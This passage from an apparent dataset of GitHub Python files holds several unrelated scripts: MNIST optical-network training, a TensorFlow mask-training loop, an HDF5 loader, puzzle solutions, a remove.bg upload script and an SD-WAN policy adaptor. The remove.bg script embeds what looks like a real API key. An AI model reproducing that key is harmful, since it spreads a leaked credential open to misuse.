get_acc(net)\n\n print(f'Trained ComplexGridNet with accuracy {acc}.')\n\n # Save model\n if f:\n th.save(net.state_dict(), f)\n print(f'Saved model to {f}.')\n\n'''\nTrain networks based on GridNet for 10 epochs.\n\nInputs:\n f: location to save the network\n n_h: # of hidden units\n'''\ndef train_grid(f=F_GRID_TRAIN, n_h=[256, 256]):\n\n # Define training parameters\n train_params = {}\n train_params['n_epochs'] = 5\n train_params['log_interval'] = 100\n train_params['batch_size'] = 100\n\n # Define optimization parameters\n optim_params = {}\n optim_params['lr'] = LR_GRID\n optim_params['momentum'] = .9\n\n # Create model\n net = mnist_ONN(hidden_units=n_h)\n\n # Train for 10 epochs, slashing learning rate after 5\n train(net, **train_params, optim_params=optim_params)\n optim_params['lr'] /= 5\n train(net, **train_params, optim_params=optim_params)\n acc = get_acc(net)\n\n print(f'Trained GridNet with accuracy {acc}.')\n\n # Save model\n if f:\n th.save(net.state_dict(), f)\n print(f'Saved model to {f}.')\n\n'''\nTrain networks based on FFTNet for 10 epochs.\n\nInputs:\n f: location to save the network\n n_h: # of hidden units\n'''\ndef 
train_fft(f=F_FFT_TRAIN, n_h=[256, 256]):\n \n # Define training parameters\n train_params = {}\n train_params['n_epochs'] = 5\n train_params['log_interval'] = 100\n train_params['batch_size'] = 100\n\n # Define optimization parameters\n optim_params = {}\n optim_params['lr'] = LR_FFT*3\n optim_params['momentum'] = .9\n\n # Create model\n net = mnist_ONN(FFTUnitary, hidden_units=n_h)\n\n # Train for 10 epochs, slashing learning rate after 5\n train(net, **train_params, optim_params=optim_params)\n optim_params['lr'] /= 5\n train(net, **train_params, optim_params=optim_params)\n acc = get_acc(net)\n\n print(f'Trained FFTNet with accuracy {acc}.')\n\n # Save model\n if f:\n th.save(net.state_dict(), f)\n print(f'Saved model to {f}.')\n\n'''\nConverts a ComplexNet into a GridNet.\n\nInputs:\n complex_net: the ComplexNet to convert\n f: location to save the GridNet\n rand_S: randomize GridNet structure\n'''\n'''\ndef convert_save_grid_net(complex_net=None, f=None, rand_S=True):\n if complex_net is None:\n complex_net = load_complex()\n\n if f is None:\n f = F_GRID_TRAIN if rand_S else F_GRID_ORD_TRAIN\n\n grid_net = complex_net.to_grid_net(rand_S=rand_S).to(DEVICE)\n acc = get_acc(grid_net)\n print(f'Converted to GridNet with accuracy {acc} with {\"shuffled\" if rand_S else \"ordered\"} singular values.')\n th.save(grid_net.state_dict(), f)\n print(f'Saved GridNet at {f}')\n'''\n\n'''\nTrain the ComplexNet in batches.\n\nInputs:\n n_train: Number of batches to train for\n dir: directory to save batches\n'''\ndef batch_train_complex(n_train, dir = DIR_COMPLEX_TRAIN):\n for _ in range(n_train):\n f = os.path.join(dir, f'{time():.0f}')\n train_complex(f=f)\n\n'''\nConvert a batch trained ComplexNet to a GridNet\n\nInputs:\n dir: directory of batches\n'''\n'''\ndef batch_convert(dir = DIR_COMPLEX_TRAIN):\n for f in glob(os.path.join(dir, '*')):\n net = load_complex(f)\n convert_save_grid_net(net, f=f+'_grid')\n'''\n\n'''\nLoad a ComplexNet from Directory\n\nInputs:\n f: Directory of the model\n\nOutputs:\n The loaded model\n'''\ndef load_complex(f=F_COMPLEX_TRAIN):\n net = mnist_complex()\n net.load_state_dict(th.load(f, map_location=DEVICE))\n acc, confusion_matrix = get_acc(net)\n print(f'ComplexNet loaded from {f} with accuracy {acc}.')\n print(confusion_matrix)\n return net.to(DEVICE)\n\n'''\nLoad a GridNet from Directory and generate accuracy/confusion matrices.\n\nInputs:\n f: Directory of the model\n rand_S: whether or not to randomize GridNet states\n report_acc: whether or not to generate accuracy/confusion matrices\n\nOutputs:\n The loaded model\n'''\ndef load_grid(f=os.path.join(DIR_TRAINED_MODELS, 'grid_1_layer.pth'), rand_S=True, report_acc=True):\n if f is None:\n f = F_GRID_TRAIN if rand_S else F_GRID_ORD_TRAIN\n net = mnist_ONN()\n net.load_state_dict(th.load(f, map_location=DEVICE))\n acc, confusion_matrix = get_acc(net)\n print(f'GridNetOrdered loaded from {f} with accuracy {acc}.')\n print(confusion_matrix)\n return net.to(DEVICE)\n\n'''\nLoad a FFTNet from Directory.\n\nInputs:\n f: Directory of the model\n\nOutputs:\n The loaded model\n'''\ndef load_fft(f=os.path.join(DIR_TRAINED_MODELS, 'fft_net.pth')):\n net = mnist_ONN(FFTUnitary)\n print(net)\n print(th.load(f, map_location=DEVICE))\n net.load_state_dict(th.load(f, map_location=DEVICE))\n acc, confusion_matrix = get_acc(net)\n print(f'FFTNet loaded from {f} with accuracy {acc}.')\n print(confusion_matrix)\n return net.to(DEVICE)\n\n'''\nLoad a CGRDNet from Directory\n\nInputs:\n f: Directory of the model\n\nOutputs:\n The 
loaded model\n'''\ndef load_cgrd(f=F_CGRD_TRAIN):\n net = mnist_ONN(CGRDUnitary)\n net.load_state_dict(th.load(f, map_location=DEVICE))\n acc, confusion_matrix = get_acc(net)\n print(f'CGRDNet loaded from {f} with accuracy {acc}.')\n print(confusion_matrix)\n return net.to(DEVICE)\n\n'''\nLoad a Truncated GridNet from Directory\n\nInputs:\n f: Directory of the model\n\nOutputs:\n The loaded model\n'''\ndef load_trunc_grid(f=os.path.join(DIR_TRAINED_MODELS, 'truncated_grid.pth')):\n net = mnist_grid_truncated()\n print(net)\n print(th.load(f, map_location=DEVICE))\n net.load_state_dict(th.load(f, map_location=DEVICE))\n acc, confusion_matrix = get_acc(net)\n print(f'Truncated GridNet loaded from {f} with accuracy {acc}.')\n print(confusion_matrix)\n return net.to(DEVICE)\n\nif __name__ == '__main__':\n #train_complex()\n net = load_grid()\n \n for data, target in mnist_loader(train=False, batch_size=100, shuffle=False):\n continue\n data = data.view(-1, 28**2)\n data, target = data.to(DEVICE), target.to(DEVICE)\n print(th.max(net(data), dim=1))\n","repo_name":"rishab-partha/Quantum-Optical-ConvNet","sub_path":"train_mnist.py","file_name":"train_mnist.py","file_ext":"py","file_size_in_byte":8614,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"53"} +{"seq_id":"72582360807","text":"import numpy as np\nimport tensorflow as tf\nimport scipy.io as scio\nimport h5py\nimport time\nimport os, os.path\nfrom sklearn.utils import shuffle\nfrom sklearn.model_selection import train_test_split\n\n\n\n\n\nTRAIN_ROOT = '/media/coc/Dataset/train/'\nTEST_ROOT = '/media/coc/Dataset/test/'\nMATFILE = '/media/coc/Dataset/model-20180124.mat'\nPARTITIONS = 4\n\nBM_BINS = 257\nBM_SPREAD = 24\nHIDDEN_LAYER_WIDTH = 2048\n\nN_EPOCHS = 100\nBATCH_SIZE_INIT = 1000\nLEARN_RATE_INIT = 0.01\nDROPOUT_COEFF = 0.8\nL2_LOSS_COEFF = 0.00\nMOMENTUM_COEFF = 0.9\n\n\n\n\nTRAIN_PARTS = len([name for name in os.listdir(TRAIN_ROOT)])\nTEST_PARTS = len([name for name in os.listdir(TEST_ROOT)])\nprint(TRAIN_PARTS)\nprint(TEST_PARTS)\nrng = np.random.RandomState(842)\n\n\n\n\n\n##########################\n## GRAPH ##\n##########################\nclass Dense:\n\n def __init__(self, in_dim, out_dim, function=lambda x: x):\n self.W = tf.Variable(rng.uniform(low = -0.1, high = 0.1, size=(in_dim, out_dim)).astype('float32'), name='W')\n self.b = tf.Variable(np.zeros([out_dim]).astype('float32'))\n self.function = function\n self.params = [self.W, self.b]\n # self.ae = Autoencoder(in_dim, out_dim, self.W, self.function)\n\n def f_prop(self, x):\n u = tf.matmul(x, self.W) + self.b\n self.z = self.function(u)\n return self.z\n\n # def pretrain(self, x, noise):\n # cost, reconst_x = self.ae.reconst_error(x, noise)\n # return cost, reconst_x\n\n\n\ndef f_props(layers, x):\n for i, layer in enumerate(layers):\n x = layer.f_prop(x)\n if(i != len(layers)-1):\n x = tf.nn.dropout(x, keep_prob)\n return x\n\n\n\n\nlayers = [\n Dense(BM_BINS*BM_SPREAD, HIDDEN_LAYER_WIDTH, tf.nn.sigmoid),\n Dense(HIDDEN_LAYER_WIDTH, HIDDEN_LAYER_WIDTH, tf.nn.sigmoid),\n Dense(HIDDEN_LAYER_WIDTH, HIDDEN_LAYER_WIDTH, tf.nn.sigmoid),\n Dense(HIDDEN_LAYER_WIDTH, BM_BINS)\n]\n\nkeep_prob = tf.placeholder(tf.float32)\nx = tf.placeholder(tf.float32, [None, BM_BINS*BM_SPREAD])\nt = tf.placeholder(tf.float32, [None, BM_BINS])\ny = f_props(layers, x)\nlrate_p = tf.placeholder(tf.float32)\nmt_p = tf.placeholder(tf.float32)\n\n# cost = tf.reduce_mean(tf.reduce_sum((y - t)**2, 1))\ncost_op = 
(tf.reduce_mean(tf.reduce_sum(tf.nn.sigmoid_cross_entropy_with_logits(labels=t, logits=y), 1)) + \n (L2_LOSS_COEFF * tf.nn.l2_loss(layers[0].W)) +\n (L2_LOSS_COEFF * tf.nn.l2_loss(layers[1].W)) +\n (L2_LOSS_COEFF * tf.nn.l2_loss(layers[2].W)) +\n (L2_LOSS_COEFF * tf.nn.l2_loss(layers[3].W)))\ntrain_op = tf.train.MomentumOptimizer(learning_rate=lrate_p, momentum=mt_p).minimize(cost_op)\n\n# saver = tf.train.Saver()\nsess = tf.Session()\nsess.run(tf.global_variables_initializer())\n\n\n\n\n\n\n\n##########################\n## PROCESSING ##\n##########################\n\ndef load_dataset_to_mem(path, part_list):\n\n temp = scio.loadmat(path + 't_' + str(part_list[0]) + '.mat')\n spect = np.array(temp['spec'], dtype='float32')\n label = np.array(temp['bm'], dtype='float32')\n del temp\n\n for p_ in range(1, part_list.shape[0]):\n\n temp = scio.loadmat(path + 't_' + str(part_list[p_]) + '.mat')\n temp_spect = np.array(temp['spec'], dtype='float32')\n temp_label = np.array(temp['bm'], dtype='float32')\n \n spect = np.concatenate((spect,temp_spect))\n label = np.concatenate((label,temp_label))\n\n del temp_label\n del temp_spect\n del temp\n\n return spect, label\n\n\n\n\ndef evaluate_cost(spect, label):\n\n cost_value = sess.run(cost_op, feed_dict={x:spect, t:label, keep_prob:1.0})\n return cost_value\n\n\n\n\ndef training():\n\n evaluate_cost_opt = 1000000.0\n mt = MOMENTUM_COEFF\n lrate = LEARN_RATE_INIT\n lbs = BATCH_SIZE_INIT\n\n test_datapool, test_labelpool = load_dataset_to_mem(TEST_ROOT, shuffle(range(1,1+TEST_PARTS)))\n evaluate_cost_val = evaluate_cost(test_datapool, test_labelpool)\n print('[init]: validation cost: %.3f ' % (evaluate_cost_val))\n\n for epoch in range(N_EPOCHS):\n \n # exponential decay (simulated annealing) may converge to 'sharp' global minimum\n # which generalizes poorly. 
we use hybrid discrete noise scale falling here.\n if epoch >= 20:\n lbs = 2000\n if epoch >= 40:\n lbs = 4000\n if epoch >= 60:\n lbs = 8000\n if epoch >= 70:\n lrate = 0.001\n if epoch >= 80:\n lrate = 0.0001\n if epoch >= 90:\n lrate = 0.00001\n \n time_start = time.time()\n part_list = shuffle(range(1,1+TRAIN_PARTS))\n part_n = len(part_list)\n part_i = 0\n\n part_list_breakout = np.array_split(part_list, PARTITIONS)\n for part_ in part_list_breakout:\n \n train_data, train_label = load_dataset_to_mem(TRAIN_ROOT, part_)\n train_data, train_label = shuffle(train_data, train_label)\n n_batch = train_label.shape[0] // lbs\n\n for i in range(n_batch):\n start = i * lbs\n end = start + lbs\n sess.run(train_op, feed_dict={x:train_data[start:end], t:train_label[start:end], keep_prob:DROPOUT_COEFF, lrate_p:lrate, mt_p:mt})\n\n del train_label\n del train_data \n part_i += 1\n print('...%d/%d'%(part_i,part_n))\n\n evaluate_cost_val = evaluate_cost(test_datapool, test_labelpool)\n time_end = time.time()\n print('[epoch %i] validation cost = %.3f ' % (epoch + 1, evaluate_cost_val))\n print('[epoch %i] time = %.3f (sec)' % (epoch + 1, time_end - time_start))\n\n if (evaluate_cost_val < evaluate_cost_opt):\n save_dict = {}\n save_dict['W1'] = sess.run(layers[0].W)\n save_dict['b1'] = sess.run(layers[0].b)\n save_dict['W2'] = sess.run(layers[1].W)\n save_dict['b2'] = sess.run(layers[1].b)\n save_dict['W3'] = sess.run(layers[2].W)\n save_dict['b3'] = sess.run(layers[2].b)\n save_dict['W4'] = sess.run(layers[3].W)\n save_dict['b4'] = sess.run(layers[3].b)\n\n scio.savemat(MATFILE, save_dict)\n evaluate_cost_opt = evaluate_cost_val\n print('[epoch %d] model saved' % (epoch + 1))\n\n del test_labelpool\n del test_datapool\n\n\n\n\ntraining()\nsess.close()\n\n\n\n\n\n\n\n\n##########################\n## NOT IN USE ##\n##########################\ndef make_window_buffer(x, neighbor=3):\n m, n = x.shape\n tmp = np.zeros(m * n * (neighbor * 2 + 1), dtype='float32').reshape(m, -1)\n for i in range(2 * neighbor + 1):\n if (i <= neighbor):\n shift = neighbor - i\n tmp[shift:m, i * n: (i + 1) * n] = x[:m - shift]\n for j in range(shift):\n tmp[j, i * n: (i + 1) * n] = x[0, :]\n else:\n shift = i - neighbor\n tmp[:m-shift, i * n: (i+1) * n] = x[shift:m]\n for j in range(shift):\n tmp[m-(j + 1), i * n: (i + 1) * n] = x[m-1, :]\n return tmp\n\ndef Normalize_data(x, mu, std):\n mean_noisy_10 = np.tile(mu, [8])\n std_noisy_10 = np.tile(std, [8])\n tmp = (x-mean_noisy_10)/std_noisy_10\n return np.array(tmp, dtype='float32')\n\ndef Normalize_label(x, mu, std):\n tmp = (x-mu)/std\n return np.array(tmp, dtype='float32')\n\ndef gen_context(x, neighbor, gmu, gstd):\n m = x.shape[0]\n u = make_window_buffer(x, neighbor)\n\n nat = np.zeros([m, 257])\n for k in range(0,7):\n nat += u[:, k*257:(k+1)*257]\n u = np.c_[u, nat/7]\n u = Normalize_data(u, gmu, gstd)\n return u\n# u: np.zeros([m, 257*8])\n\nclass Autoencoder:\n\n def __init__(self, vis_dim, hid_dim, W, function=lambda x: x):\n self.W = W\n self.a = tf.Variable(np.zeros(vis_dim).astype('float32'), name='a')\n self.b = tf.Variable(np.zeros(hid_dim).astype('float32'), name='b')\n self.function = function\n self.params = [self.W, self.a, self.b]\n\n def encode(self, x):\n u = tf.matmul(x, self.W) + self.b\n return self.function(u)\n\n def decode(self, x):\n u = tf.matmul(x, tf.transpose(self.W)) + self.a\n return self.function(u)\n\n def f_prop(self, x):\n y = self.encode(x)\n return self.decode(y)\n\n def reconst_error(self, x, noise):\n tilde_x = x * noise\n reconst_x 
= self.f_prop(tilde_x)\n error = tf.reduce_mean(tf.reduce_sum((x - reconst_x)**2, 1))\n return error, reconst_x\n\n\n\n\n","repo_name":"xia-lixun/dnn","sub_path":"src/python/train-crossentropy-matlab.py","file_name":"train-crossentropy-matlab.py","file_ext":"py","file_size_in_byte":8468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35225274312","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\n@author: pho\n\"\"\"\nimport sys\nimport numpy as np\nimport pandas as pd\nfrom scipy.stats import kde\nimport h5py\nimport hdf5storage # conda install hdf5storage\nfrom pathlib import Path\n\n# Include using: from Pho_Import_Matlab_Data import import_mat_file, load_mat_file, print_variables\n\nfrom Pho_Import_Matlab_Data.plot_matlab_fig_file import plot_matlab_fig_file\n\n# See https://docs.h5py.org/en/stable/quick.html#quick for more info\n## In short, An HDF5 file is a container for two kinds of objects: datasets, which are array-like collections of data, and groups, which are folder-like containers that hold datasets and other groups. The most fundamental thing to remember when using h5py is:\n#### Groups work like dictionaries, and datasets work like NumPy arrays\n\nenable_print_type_values = True\n\ndef printname(name):\n print(name)\n\ndef print_attrs(name, obj):\n # Create indent\n shift = name.count('/') * ' '\n item_name = name.split(\"/\")[-1] # Get only the last suffix of the path (the variable name)\n if name.startswith(\"#refs#\"):\n # Exclude top level '#refs#' Group\n # print('Skipping #refs# group and its children...')\n # return -1 # Apparently returning a non-None value stops enumeration\n pass\n else:\n if isinstance(obj, h5py.Dataset):\n # obj node is a dataset\n print(': ' + shift + item_name)\n else:\n # obj node is a group\n print(': ' + shift + item_name)\n if enable_print_type_values:\n try:\n for key, val in obj.attrs.items():\n print(shift + ' ' + f\"{key}: {val}\")\n except:\n pass\n\n\n## Import Function Definitions:\n\ndef import_mat_file(mat_file_path):\n print('opening .mat file at {}'.format(mat_file_path))\n f = h5py.File(mat_file_path,'r')\n return f\n # print(f.keys())\n # data_position = f.get(active_variables)\n\n \ndef build_tree_entries(mat_file):\n data = [\n {'level': 0, 'dbID': 77, 'parent_ID': 6, 'short_name': '{}'.format(mat_file), 'long_name': '', 'order': 1, 'pos': 0} ,\n ]\n # f.keys()\n return data\n\n\ndef print_variables(h5pyFile, recurrsively=False):\n # Get the list of keys for the file\n # h5pyFile.keys()\n # h5pyFile.visit(printname)\n h5pyFile.visititems(print_attrs)\n\ndef load_mat_file(mat_file_path):\n out = hdf5storage.loadmat(mat_file_path) # Load all variables by default\n return out\n\n#end\n","repo_name":"CommanderPho/PhoPyMatlabConverter","sub_path":"Pho_Import_Matlab_Data/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2520,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"27967151286","text":"import sys\n\ninputing = lambda : sys.stdin.readline().rstrip()\nwow = lambda : map(int,inputing().split())\none = lambda : int(inputing())\n\n#https://www.acmicpc.net/problem/21735\n# l,k = wow()\n# n_list = [1]+list(wow())\n# cnt = 0\n# visited = [False]*(l+1)\n# def go(index,count,total,visited,record):\n# global k\n# global cnt\n# global l\n# # print(\"start!!\",index)\n# # print(\"record\",record,count)\n# # print(\"start\",index,count,total)\n# if count == k+1:\n# # 
print(\"wow!!\",index,total,count)\n# # print(visited)\n# if cnt < total:\n# cnt = total\n# return\n# if index <=l:\n# if visited[index] == False:\n# visited[index]=True\n# total+=n_list[index]\n# record.append(total)\n# count+=1\n# go(index+1,count,total,visited,record)\n# go(index+2,count,total//2,visited,record)\n# record.pop()\n# count-=1\n# total-=n_list[index]\n# visited[index]=False\n# else:\n# if cnt < total:\n# cnt = total\n# return\n# go(0,0,0,visited,[])\n# print(cnt)\n\n#https://www.acmicpc.net/problem/26169\n# n_list = [list(wow()) for _ in range(5)]\n# r,l = wow()\n# visited = [[False]*5 for _ in range(5)]\n# for y in range(5):\n# for x in range(5):\n# if n_list[y][x]==-1:\n# visited[y][x]=True\n# check = \"no\"\n# def go(y,x,count,total,visited):\n# global check\n# # print(\"Start\",y,x,count,total)\n# if count == 4:\n# if total >= 2:\n# check = \"yes\"\n# return\n# if total >=2:\n# check = \"yes\"\n# return\n# if 0<=y<=4 and 0<=x<=4:\n# if visited[y][x] == False:\n# visited[y][x]=True\n# if n_list[y][x] == 1:\n# total+=1\n# count+=1\n# go(y+1,x,count,total,visited) \n# go(y-1,x,count,total,visited) \n# go(y,x+1,count,total,visited) \n# go(y,x-1,count,total,visited) \n# count-=1\n# visited[y][x]=False\n# if n_list[y][x]==1:\n# total-=1\n# go(r,l,0,0,visited)\n# print(0 if check==\"no\" else 1)\n\n#https://www.acmicpc.net/problem/25328\nfrom itertools import permutations\na = list(inputing())\nb = list(inputing())\nc = list(inputing())\nk = one()\na = set(permutations(a,r=k))\nb = set(permutations(b,r=k))\nc = set(permutations(c,r=k))\nx,y,z = set(a&b),set(b&c),set(a&c)\nr = set(list(map(\"\".join,(map(sorted,list(x | y|z))))))\nif r:\n r = sorted(list(r))\n print(*r,sep=\"\\n\")\nelse:\n print(-1)\n\n\n\n\n\n\n\n\n","repo_name":"WinterWhiteSnow/Python-Baekjoon","sub_path":"2023/2월/3.py","file_name":"3.py","file_ext":"py","file_size_in_byte":2647,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33941340008","text":"# Requires \"requests\" to be installed (see python-requests.org)\nimport requests\npath = input(\"Enter file path\")\nresponse = requests.post(\n 'https://api.remove.bg/v1.0/removebg',\n files={'image_file': open(path, 'rb')},\n data={'size': 'auto'},\n headers={'X-Api-Key': 'BeoTpZimF517Xc2vFsAN1HLY'},\n)\nif response.status_code == requests.codes.ok:\n with open('no-bg.png', 'wb') as out:\n out.write(response.content)\nelse:\n print(\"Error:\", response.status_code, response.text)\n","repo_name":"abhinavsatheesh/Programming","sub_path":"Python/PythonPrograms/RemoveImageBg.py","file_name":"RemoveImageBg.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21076248226","text":"import os\nimport logging\nimport pprint\nlogging.basicConfig(filename='adaptor.log', level=logging.DEBUG, \\\n datefmt='%a, %d %b %Y %H:%M:%S')\nlogger = logging.getLogger(__name__)\n \n\n\nimport metadata_adaptor.server_errors as err\nimport metadata_adaptor.template_generator as templates\nimport metadata_adaptor.vmanage_functions as vmg\n\nclass api_endpoint:\n\n def __init__(self):\n\n \n #Load config via env vars\n SDWAN_IP = os.environ.get(\"SDWAN_IP\")\n SDWAN_USERNAME = os.environ.get(\"SDWAN_USERNAME\")\n SDWAN_PASSWORD = os.environ.get(\"SDWAN_PASSWORD\")\n MERGE_POLICY = os.environ.get(\"MERGE_POLICY\")\n\n # SDWAN Controller endpoint\n self.api_endpoint = None\n\n # Internal vars \n self.srv_endpoints = {}\n 
self.app_route_traffic_profiles = {}\n self.data_traffic_profiles = {}\n self.metadata_keys = []\n\n # SDWAN Controller credentials\n self.credentials = {}\n self.credentials['sdwanControllerIpAddress'] = None\n self.credentials['user'] = None\n self.credentials['password'] = None\n self.credentials['sdwanMergedPolicyName'] = None\n\n\n\n # SDWAN controller login if env vars \n if (SDWAN_IP is not None) and (SDWAN_USERNAME is not None) \\\n and (SDWAN_PASSWORD is not None) and (MERGE_POLICY is not None):\n self.credentials['sdwanControllerIpAddress'] = SDWAN_IP\n self.credentials['user'] = SDWAN_USERNAME\n self.credentials['password'] = SDWAN_PASSWORD\n self.credentials['sdwanMergedPolicyName'] = MERGE_POLICY\n self.post_credentials(self.credentials)\n \n logger.info('Connecting to server %s', SDWAN_IP)\n \n\n def check_config(self):\n\n if self.credentials['sdwanControllerIpAddress'] is None or \\\n self.credentials['user'] is None or \\\n self.credentials['password'] is None:\n logger.error(\"Credentials of SDWAN controller are not defined.\")\n raise err.NoConfigData('Controller credentials user/password or IP')\n \n def test_connection(self):\n if self.api_endpoint.test_disconnect():\n logger.info(\"Connection lost to the SDWAN controller, re-authenticating.\")\n self.post_credentials(self.credentials)\n \n\n \n\n### SDWAN CONTROLLER CREDENTIALS\n\n def get_credentials(self):\n return self.credentials\n\n def post_credentials(self, cred):\n try:\n self.api_endpoint = vmg.rest_api_lib(cred['sdwanControllerIpAddress'], \\\n cred['user'], cred['password'])\n except Exception as e:\n raise e\n self.credentials = cred\n \n\n def delete_credentials(self):\n self.credentials['sdwanControllerIpAddress'] = None\n self.credentials['user'] = None\n self.credentials['password'] = None\n self.credentials['sdwanMergedPolicyName'] = None\n\n\n### SERVICE ENDPOINTS MANAGEMENT\n \n def get_service_endpoints_by_profile(self, profile):\n \n endpoints =[]\n \n for key, data in self.srv_endpoints.items():\n if data['trafficProfileName'] == profile:\n endpoints.append(key)\n \n return endpoints\n \n def delete_service_endpoint_by_profile(self, profile):\n \n to_delete = []\n \n for key, data in self.srv_endpoints.items():\n if data['trafficProfileName'] == profile:\n to_delete.append(key)\n \n for key in to_delete:\n del self.srv_endpoints[key] \n \n\n def get_service_endpoints(self):\n\n temp = []\n for key, profile in self.srv_endpoints.items():\n temp_key = key.split('_')\n temp.append({\n \"ipAddress\": temp_key[0],\n \"portNumber\": temp_key[1],\n \"trafficProfileName\": profile\n })\n return temp\n\n def post_service_endpoint(self, ipAddress, portNumber, profileName):\n\n key = ipAddress + '_' + portNumber\n error = {}\n \n if key in self.srv_endpoints.keys():\n msg = \"Ignoring request: the endpoint\" + key + \" is already defined\"\n logger.warning( err.ElementAlreadyDefined(\"post_service_endpoint\", msg))\n error['status'] = 400\n error['title'] = 'ENDPOINT ALREADY DEFINED'\n error['description'] = 'The endpoint IP: ' + ipAddress + ' and port ' + portNumber + ' is already defined. 
Ignoring this event.'\n return True, error\n \n defined, profile_type = self.is_traffic_profile_defined(profileName)\n if not defined:\n logger.warning(err.CannotFindElement('post_service_endpoint', \\\n 'Traffic profile ' + profileName + ' is not defined, ignoring request.'))\n error['status'] = 400\n error['title'] = 'CANNOT FIND TRAFFIC PROFILE'\n error['description'] = 'The traffic profile ' + profileName + ' is not defined. Ignoring this event.'\n return True, error\n \n \n try:\n\n if profile_type == 'AppRoute':\n \n policy_name = self.app_route_traffic_profiles[profileName]['policyName']\n defined, policy_id = self.is_policy_defined(policy_name, profile_type) \n if not defined:\n raise err.CannotFindElement('post_service_endpoint', policy_name)\n \n policy = self.api_endpoint.get_approute_policy_by_id(policy_id)\n payload = templates.add_approute_endpoint(policy, ipAddress, portNumber)\n response = self.api_endpoint.put_approute_policy(policy_id, payload, 'post_service_endpoint')\n self.srv_endpoints[key] = {\n 'trafficProfileName': profileName,\n 'policyId' : policy_id }\n # Trigger update for centralized policies that are active\n # The masterTemplatesAffected array is empty if the policy is NOT active\n if len(response[\"masterTemplatesAffected\"]) != 0:\n self.api_endpoint.update_active_policy(response[\"masterTemplatesAffected\"], 'post_service_endpoint')\n\n\n elif profile_type == 'Data':\n \n policy_name = self.data_traffic_profiles[profileName]['policyName']\n defined, policy_id = self.is_policy_defined(policy_name, profile_type) \n if not defined: \n raise err.CannotFindElement('post_service_endpoint', policy_name) \n \n policy = self.api_endpoint.get_data_policy_by_id(policy_id)\n payload = templates.add_data_endpoint(policy, ipAddress, portNumber)\n response = self.api_endpoint.put_data_policy(policy_id, payload, 'post_service_endpoint')\n self.srv_endpoints[key] = {\n 'trafficProfileName': profileName,\n 'policyId' : policy_id }\n # Trigger update for centralized policies that are active\n # The masterTemplatesAffected array is empty if the policy is NOT active\n if len(response[\"masterTemplatesAffected\"]) != 0:\n self.api_endpoint.update_active_policy(response[\"masterTemplatesAffected\"], 'post_service_endpoint')\n\n \n except err.CannotFindElement as e:\n logger.warning('Ignoring request: Cannot find a policy called %s', e.elem)\n \n except Exception as e:\n logger.error('An error ocurred while communicating with the SDWAN controller.')\n logger.error('Details: %s', e)\n\n return False, error\n\n def delete_service_endpoint(self, ipAddress, portNumber):\n\n key = ipAddress + '_' + portNumber\n error = {}\n \n if key not in self.srv_endpoints.keys():\n logger.warning(err.CannotFindElement(\"delete_service_endpoint\", \"This endpoint is not defined, ignoring request.\"))\n error['status'] = 400\n error['title'] = 'ENDPOINT NOT FOUND'\n error['description'] = 'Cannot process DELETE event: resource IP ' + ipAddress + ' and port ' + portNumber + ' does not exist. 
Ignoring this event.'\n return True, error\n \n traffic_profile = self.srv_endpoints[key]['trafficProfileName']\n policy_id = self.srv_endpoints[key]['policyId']\n\n try:\n \n if traffic_profile in self.app_route_traffic_profiles.keys():\n policy = self.api_endpoint.get_approute_policy_by_id(policy_id)\n payload = templates.remove_endpoint(policy, ipAddress, portNumber)\n response = self.api_endpoint.put_approute_policy(policy_id, payload, 'delete_service_endpoint')\n del self.srv_endpoints[key]\n if len(response[\"masterTemplatesAffected\"]) != 0:\n self.api_endpoint.update_active_policy(response[\"masterTemplatesAffected\"], 'delete_service_endpoint')\n\n elif traffic_profile in self.data_traffic_profiles.keys(): \n policy = self.api_endpoint.get_data_policy_by_id(policy_id)\n payload = templates.remove_endpoint(policy, ipAddress, portNumber)\n response = self.api_endpoint.put_data_policy(policy_id, payload, 'delete_service_endpoint')\n del self.srv_endpoints[key]\n if len(response[\"masterTemplatesAffected\"]) != 0:\n self.api_endpoint.update_active_policy(response[\"masterTemplatesAffected\"], 'delete_service_endpoint')\n\n else:\n\n logger.warning(err.CannotFindElement('delete_service_endpoint', \\\n 'Traffic profile ' + traffic_profile + ' is not defined, ignoring request.'))\n\n except Exception as e:\n logger.error('An error ocurred while communicating with the SDWAN controller.')\n logger.error('Exception name: %s', repr(e))\n logger.error('Details: %s', e)\n \n return False, error\n \n\n\n def put_service_endpoint(self, ipAddress, portNumber, profileName):\n error_data = {}\n \n #Check if the profile is defined \n profile_defined, profile_type = self.is_traffic_profile_defined(profileName)\n \n if not profile_defined: \n logger.warning(err.CannotFindElement(\"put_service_endpoint\", \\\n \"The traffic profile \" + profileName + \" is not defined, ignoring this request\"))\n error_data['status'] = 400\n error_data['title'] = 'CANNOT FIND TRAFFIC PROFILE'\n error_data['description'] = 'The traffic profile ' + profileName + ' is not defined. 
Ignoring this event.'\n return True, error_data\n \n #Check if the policy is defined\n if profile_type == 'AppRoute':\n policyName = self.app_route_traffic_profiles[profileName]['policyName']\n\n else:\n policyName = self.data_traffic_profiles[profileName]['policyName']\n\n policy_defined, _ = self.is_policy_defined(policyName, profile_type)\n \n if not policy_defined:\n logger.warning(err.CannotFindElement(\"put_service_endpoint\", \\\n 'Ignoring request: Cannot find a policy called '+ policyName ))\n return False, error_data\n \n # Do the actual work\n error, error_data = self.delete_service_endpoint(ipAddress, portNumber)\n if error:\n return error, error_data\n else:\n error, error_data = self.post_service_endpoint(ipAddress, portNumber, profileName)\n return error, error_data\n \n \n\n\n def create_data_policy_with_all_endpoints(self, previous_cnwan_remove = []):\n \n # Collect all endpoint + tunnel info for each profile\n cnwan_seqs = []\n \n \n for name, data in self.data_traffic_profiles.items():\n \n defined, policy_id = self.is_policy_defined(data['policyName'], 'Data')\n if defined: \n\n previous_cnwan_remove.append(data['policyName']) \n policy = self.api_endpoint.get_data_policy_by_id(policy_id)\n if len(policy['sequences']) > 1:\n temp_seqs = templates.change_seq_name(policy, data['policyName'])\n for seq in temp_seqs:\n cnwan_seqs.append(seq)\n else:\n logger.warning('In create_data_policy_with_all_endpoints, ignoring 